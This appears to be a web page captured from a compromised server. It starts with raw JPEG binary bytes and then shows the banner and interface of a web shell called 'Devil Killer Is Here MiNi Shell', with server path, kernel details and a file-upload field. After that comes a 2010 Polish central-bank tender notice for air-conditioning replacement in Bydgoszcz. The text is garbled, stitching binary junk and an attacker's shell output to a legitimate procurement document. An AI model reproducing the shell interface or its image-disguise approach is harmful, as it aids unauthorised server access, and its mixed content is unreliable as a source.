JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100315/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100315/56337-N-2010.html

<p class="kh_header"><b>Bydgoszcz: Wymiana instalacji i urządzeń klimatyzacyjnych systemowych oraz montaż 2 nowych urządzeń typu SPLIT wraz z ich dostawą</b><br>
<b>Numer ogłoszenia: 56337 - 2010; data zamieszczenia: 15.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Narodowy Bank Polski Oddział Okręgowy w Bydgoszczy , ul. Jagiellońska 8, 85-950 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3268200, faks 052 3268309.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nbp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Bank Centralny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana instalacji i urządzeń klimatyzacyjnych systemowych oraz montaż 2 nowych urządzeń typu SPLIT wraz z ich dostawą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ogólny zakres zamówienia

Przedmiotem zamówienia jest:

1. demontaż istniejących instalacji i urządzeń klimatyzacyjnych systemowych  znajdujących się we wskazanych pomieszczeniach wraz z ich wywozem i utylizacją,
2. dostawa i montaż nowych instalacji oraz urządzeń klimatyzacyjnych systemowych oraz 2 urządzeń typu SPLIT, w tym również:
a) przeprowadzenie badania szczelności instalacji obiegu czynnika chłodniczego,
b) przeprowadzenie badania szczelności instalacji skroplinowej,
c) przeprowadzenie testów przewidzianych przez producenta urządzeń,
d) uruchomienie urządzeń,
e) instruktaż dla użytkowników pomieszczeń klimatyzowanych,
3. sporządzenie dokumentacji powykonawczej (2 egz.) zamontowanych instalacji i urządzeń klimatyzacyjnych 
(w tym: szkice sytuacyjne tras przebiegu instalacji i umiejscowienia urządzeń klimatyzacyjnych z opisem typów i parametrów technicznych),
4. świadczenie usług konserwacyjnych i serwisowych w okresie gwarancji wykonawcy, tj. minimum w okresie 3 lat od daty odbioru robót - w zakresie zamontowanych instalacji i urządzeń stanowiących przedmiot zamówienia.

Szczegółowy zakres zamówienia

Zakresem zamówienia objęte są następujące struktury klimatyzacyjne:
a) Wymiana istniejącego systemu klimatyzacji (system VRV serii H), składającego się z 7 urządzeń firmy DAIKIN (w tym: 5 jednostek wewnętrznych przypodłogowych wolnostojących, 1 jednostka wewnętrzna podstropowa i 1 jednostka zewnętrzna wolnostojąca umiejscowiona na poziomie gruntu) - czynnik chłodniczy R22 (ilość ok. 21 kg), z instalacją o długości łącznej ok. 60 mb o średnicy stopniowanej z wykorzystaniem trójników KHR22A30TAM7 (3 szt.) i KHR22A16TAM7 (3 szt.), średnica rur przyłączeniowych 12/28 mm.
Istniejąca instalacja klimatyzacyjna ułożona jest częściowo na ścianach wewnętrznych i zewnętrznych w korytach elektroinstalacyjnych, częściowo przebiega w przestrzeni międzystropowej (stropy podwieszane), trasy instalacji przechodzą również poprzez przegrody budowlane poziome i pionowe o różnej strukturze. 
Wymagany jest demontaż wszystkich wymienionych urządzeń istniejących wraz z instalacją klimatyzacyjną oraz ich wywóz i utylizacja. Istniejącą instalację elektryczną, której parametry nie pozwalają na wykorzystanie do zasilania nowego systemu klimatyzacji, po jej rozłączeniu pozostawia się w strukturach budowlanych jako rezerwę.
Nowe urządzenia oraz trasy przebiegu instalacji klimatyzacyjnych winny zostać umiejscowione analogicznie do istniejących z możliwym wykorzystaniem istniejących przejść, przepustów, koryt elektroinstalacyjnych oraz łączników budowlanych. Nowa instalacja zasilania elektrycznego wszystkich urządzeń systemu prowadzona będzie z tablicy rozdzielczej wskazanej przez zamawiającego, w tym:
- odcinek od tablicy rozdzielczej do jednostki zewnętrznej: YDY5x10 i YDY5x4 (parametry zalecane) - prowadzony w przestrzeni między stropem a sufitem podwieszonym z 2 przejściami przez ściany wewnętrzne murowane i 1 przejściem przez ścianę zewnętrzną murowaną - łączna długość odcinka ok. 60 mb,
- zasilanie jednostek wewnętrznych - od umiejscowienia jednostki zewnętrznej trasami instalacji klimatyzacyjnej z wykorzystaniem istniejących przepustów.
Dobór właściwych dla oferowanych przez wykonawcę urządzeń parametrów instalacji zasilania elektrycznego winien być zgodny z obowiązującymi w tym zakresie normami technicznymi i zapewniać prawidłową i bezpieczną pracę systemu.

Dopuszcza się odprowadzenie skroplin nowo zainstalowanych urządzeń istniejącymi trasami skroplinowymi z możliwością wykorzystania rur istniejących.

Nowy system klimatyzacyjny winien spełniać następujące warunki techniczne:
- dostępne tryby pracy: chłodzenie + grzanie
- czynnik chłodniczy: typ R410a,
- wskaźnik efektywności energetycznej chłodniczej (EER) o wartości nominalnej - nie niższy niż 3,23,
- wskaźnik efektywności energetycznej cieplnej (COP) o wartości nominalnej - nie niższy niż 3,98,
- zakres temperatur pracy (w trybie chłodzenia) - od -5 st.C do +43 st.C lub szerszy (w odniesieniu do temperatur powietrza zewnętrznego gwarantujących ciągłą pracę urządzeń),
- zakres temperatur pracy (w trybie pompy ciepła) - od -20 st.C do +15 st.C lub szerszy (w odniesieniu do temperatur powietrza zewnętrznego gwarantujących ciągłą pracę urządzeń),
- wszystkie wymagane urządzenia - pracujące w technologii INVERTER,
- rodzaj, wydajność chłodnicza nominalna (standardowa) dla trybu chłodzenia, moc cieplna nominalna (standardowa) dla trybu grzania oraz maksymalny poziom głośności pracy jednostek wewnętrznych (poziom głośności odnosi się do poziomu ciśnienia akustycznego mierzonego w odległości ok. 1 m od urządzenia, przy pracy urządzenia na najniższym biegu wentylatora), według poniższego wykazu:
- 1 jednostka zewnętrzna wolnostojąca o wydajności chłodniczej nominalnej (standardowej) nie mniejszej niż 40,0 kW, o mocy cieplnej nominalnej (standardowej) nie mniejszej niż 45,0 kW,
- 5 jednostek wewnętrznych przypodłogowych wolnostojących, każda o wydajności chłodniczej nominalnej (standardowej) nie mniejszej niż 5,6 kW, o mocy cieplnej nominalnej (standardowej) nie mniejszej niż 6,3 kW i poziomie głośności nie większym niż 34 dB(A) oraz o wymiarze wysokości całkowitej każdego urządzenia nie większym niż 600 mm, 
- 1 jednostka wewnętrzna przyścienna/podstropowa o wydajności chłodniczej nominalnej (standardowej) nie mniejszej niż 11,2 kW, o mocy cieplnej nominalnej (standardowej) nie mniejszej niż 12,5 kW i poziomie głośności nie większym niż 37 dB(A),
- instalacja klimatyzacyjna o parametrach właściwych do prawidłowej pracy systemu w zakresie wykazanych mocy i wydajności urządzeń, zapewniająca obieg czynnika chłodniczego typu R410a.
- instalacja zasilania elektrycznego o parametrach właściwych do prawidłowej pracy systemu w zakresie zastosowanych mocy i wydajności urządzeń - zgodnie z obowiązującymi normami technicznymi.

b) Montaż 2 urządzeń klimatyzacyjnych typu SPLIT (w tym: 2 jednostki wewnętrzne i 2 jednostki zewnętrzne  - w dwóch pomieszczeniach biurowych, według poniższego wykazu:
- 1 jednostka wewnętrzna naścienna (pomieszczenie na poziomie parteru) o wydajności chłodniczej nominalnej (standardowej) nie mniejszej niż 4,2 kW, o mocy cieplnej nominalnej (standardowej) nie mniejszej niż 4,6 kW i poziomie głośności (poziom głośności odnosi się do poziomu ciśnienia akustycznego mierzonego w odległości ok. 1 m od urządzenia, przy pracy urządzenia na najniższym biegu wentylatora) nie większym niż 29 dB(A) + odpowiadająca w zakresie technicznie właściwej współpracy jednostka zewnętrzna, usytuowana w odległosci ok. 10 m na ścianie zewnętrznej budynku na wysokosci do 3 m ponad poziomem terenu. Urządzenia winny spełniać następujące warunki: dostępne tryby pracy: chłodzenie + grzanie, wskaźnik efektywności energetycznej chłodniczej (EER) o wartości nominalnej - nie niższy niż 3,44, wskaźnik efektywności energetycznej cieplnej (COP) o wartości nominalnej - nie niższy niż 3,70, czynnik chłodniczy: typ R410a, zakres temperatur pracy (w trybie chłodzenia) - od +16 st.C do +43 st.C lub szerszy (w odniesieniu do temperatur powietrza zewnętrznego gwarantujących ciągłą pracę urządzeń), zakres temperatur pracy (w trybie pompy ciepła) - od -15 st.C do +18 st.C lub szerszy (w odniesieniu do temperatur powietrza zewnętrznego gwarantujących ciągłą pracę urządzeń), rodzaj urządzeń: typu INWERTER. 
Uwarunkowania techniczne w zakresie prowadzenia instalacji: przeprowadzenie instalacji klimatyzacyjnej i zasilania elektrycznego pomiędzy jednostką zewnętrzną i wewnętrzną - w listwach elektroinstalacyjnych na powierzchniach ściennych murowanych z 1 przejściem przez ścianę wewnętrzną murowaną i 1 przejściem przez ścianę zewnętrzną murowaną; umiejscowienie tablicy rozdzielczej energetycznej - w pomieszczeniu piwnicznym w odległości poziomej ok. 8 m od urządzeń klimatyzacyjnych (konieczność przejścia przez 3 przegrody budowlane murowane).
- 1 jednostka wewnętrzna naścienna (pomieszczenie na poziomie 1 piętra) o wydajności chłodniczej nominalnej (standardowej) nie mniejszej niż 2,5 kW, o mocy cieplnej nominalnej (standardowej) nie mniejszej niż 3,4 kW i poziomie głośności (poziom głośności odnosi się do poziomu ciśnienia akustycznego mierzonego w odległości ok. 1 m od urządzenia, przy pracy urządzenia na najniższym biegu wentylatora) nie większym niż 23 dB(A) + odpowiadająca w zakresie technicznie właściwej współpracy jednostka zewnętrzna, usytuowana w odległosci ok. 4 m na połaci dachowej budynku znajdującej się bezpośrednio nad pomieszczeniem. Urządzenia winny spełniać następujące warunki: dostępne tryby pracy: chłodzenie + grzanie, wskaźnik efektywności energetycznej chłodniczej (EER) o wartości nominalnej - nie niższy niż 4,59, wskaźnik efektywności energetycznej cieplnej (COP) o wartości nominalnej - nie niższy niż 4,59, czynnik chłodniczy: typ R410a, zakres temperatur pracy (w trybie chłodzenia) - od +16 st.C do +43 st.C (w odniesieniu do temperatur powietrza zewnętrznego gwarantujących ciągłą pracę urządzeń), zakres temperatur pracy (w trybie pompy ciepła) - od -15 st.C do +18 st.C (w odniesieniu do temperatur powietrza zewnętrznego gwarantujących ciągłą pracę urządzeń), rodzaj urządzeń: typu INWERTER.
Uwarunkowania techniczne w zakresie prowadzenia instalacji: przeprowadzenie instalacji klimatyzacyjnej i zasilania elektrycznego pomiędzy jednostką zewnętrzną i wewnętrzną - w listwach elektroinstalacyjnych na powierzchniach ściennych murowanych z 1 przejściem przez stropodach betonowy; umiejscowienie tablicy rozdzielczej energetycznej - w pomieszczeniu na poziomie 1 piętra w odległości poziomej ok. 10 m od urządzeń klimatyzacyjnych (konieczność przejścia przez 2 przegrody budowlane murowane).
Urządzenia wewnętrzne wymienione w ppkt a) i b) (oprócz jednostek wewnętrznych podłogowych systemu) winny być wyposażone w piloty zdalnego sterowania z opcją montażu naściennego. W przypadku jednostek wewnętrznych podłogowych systemu urządzenia te winny być wyposażone w piloty montowane bezpośrednio na urządzeniu. Wszystkie urządzenia winny posiadać właściwą instrukcję obsługi.

Dostarczane urządzenia muszą być oryginalne, fabrycznie nowe, wolne od wad fizycznych i prawnych oraz odpowiadające pierwszej klasie jakości określonej dla tego asortymentu.
Urządzenia winny mieć stosowne oznaczenia zawierające podstawowe informacje, których przestrzeganie zapewni bezpieczne ich użytkowanie, tj.:
- nazwę producenta urządzenia,
- parametry techniczne pracy urządzenia,
- znaki bezpieczeństwa stwierdzające, że urządzenie zostało zaprojektowane i wyprodukowane w sposób zapewniający bezpieczeństwo użytkowania przy korzystaniu z niego w sposób jaki przewiduje producent lub wyprodukowane zgodnie z normami obowiązującymi w obrębie krajów Unii Europejskiej lub normami krajowymi dla pozytywnego przejścia urządzenia procedury oceny zgodności.

Realizacja robót odbywać się będzie etapami, według harmonogramu uzgadnianego na bieżąco z zamawiającym - przyjmuje się, że realizacja prac odbywać się będzie w godzinach urzędowania zamawiającego tj. od poniedziałku do piątku w godz. 7:30 - 15:30 z wyłączeniem określonych ustawowo dni świątecznych. W ramach prac zakończeniowych, wykonawca winien dokonać napraw ewentualnych zniszczeń struktur ściennych i stropowych w celu doprowadzenia ich do stanu pierwotnego. Wszystkie urządzenia techniczne oraz materiały budowlane, niezbędne dla realizacji zamówienia winny spełniać wymagania określone w art. 10 ustawy Prawo budowlane oraz posiadać odpowiednie certyfikaty lub aprobaty techniczne dopuszczające je do stosowania w budownictwie, w pomieszczeniach biurowych i technicznych. 
Wykonawca winien zapewnić całość robocizny, materiałów, sprzętu, narzędzi, transportu i dostaw, niezbędnych do wykonania robót objętych umową, zgodnie z jej warunkami oraz ewentualnymi wskazówkami zamawiającego. Każdorazowo po zakończeniu robót w każdym pomieszczeniu wykonawca zabezpieczy własnymi służbami sprzątającymi przygotowanie pomieszczenia do użytkowania. Po zakończeniu całości robót wykonawca przedstawi gotowość do odbioru końcowego. Zamawiający przeprowadzi protokolarny odbiór końcowy robót w terminie 7 dni od przyjęcia od wykonawcy zgłoszenia gotowości do odbioru. Z przeprowadzonych czynności odbioru końcowego robót zamawiający sporządzi protokół końcowego odbioru robót oraz przedstawi do podpisania umowę serwisową, której projekt stanowi załącznik nr 3 do SIWZ.

Uwaga - Zamawiający w zakresie opisu przedmiotu zamówienia przedstawia istniejącą strukturę systemu klimatyzacji, podlegającą wymianie, opartą na wykorzystaniu urządzeń firmy DAIKIN, co nie stanowi wymagalności zamawiającego w zakresie tego samego producenta dla oferowanych przez wykonawców urządzeń. Zamawiający dopuszcza możliwość oferowania urządzeń wszelkich producentów, pod warunkiem spełniania przez te urządzenia wymaganych w treści SIWZ parametrów technicznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.33.12.20-4, 42.50.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający ustala wadium na całość przedmiotu zamówienia w wysokości 5.000,00 zł (słownie złotych: pięć tysięcy 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że należycie wykonał w okresie ostatnich pięciu lat przed upływem terminu składania wniosku o dopuszczenie do udziału w postępowaniu, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej 3 zamówienia polegające na wykonaniu robót budowlanych w zakresie montażu systemów klimatyzacyjnych, o wartości brutto nie mniejszej niż 150.000,00 zł każde z podaniem ich rodzaju i wartości, daty i miejsca wykonania, oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (dokumenty te winny być składane w formie oryginału lub kopii poświadczonej przez wykonawcę za zgodność z oryginałem).  Na potwierdzenie spełniania warunku wykonawca winien załączyć do składanego wniosku o dopuszczenie do udziału w postępowaniu wykaz robót budowlanych wyszczególniony w pkt III.4.1). Wykaz winien być sporządzony w układzie tabelarycznym - według wzoru dostępnego na stronie internetowej zamawiającego: www.nbp.pl - publikacja ogłoszenia o zamówieniu) wraz z opisanymi powyżej dokumentami potwierdzającymi prawidłowe wykonanie tych zamówień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca załączy do składanego wniosku o dopuszczenie do udziału w postępowaniu dokument, o którym mowa w pkt III.4.1) tj. informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą posiadanie środków finansowych  w wysokości 50.000,00 zł lub zdolność kredytową wykonawcy w takiej wysokości, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu (dokument ten winien być złożony w formie oryginału lub kopii poświadczonej przez wykonawcę za zgodność z oryginałem).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
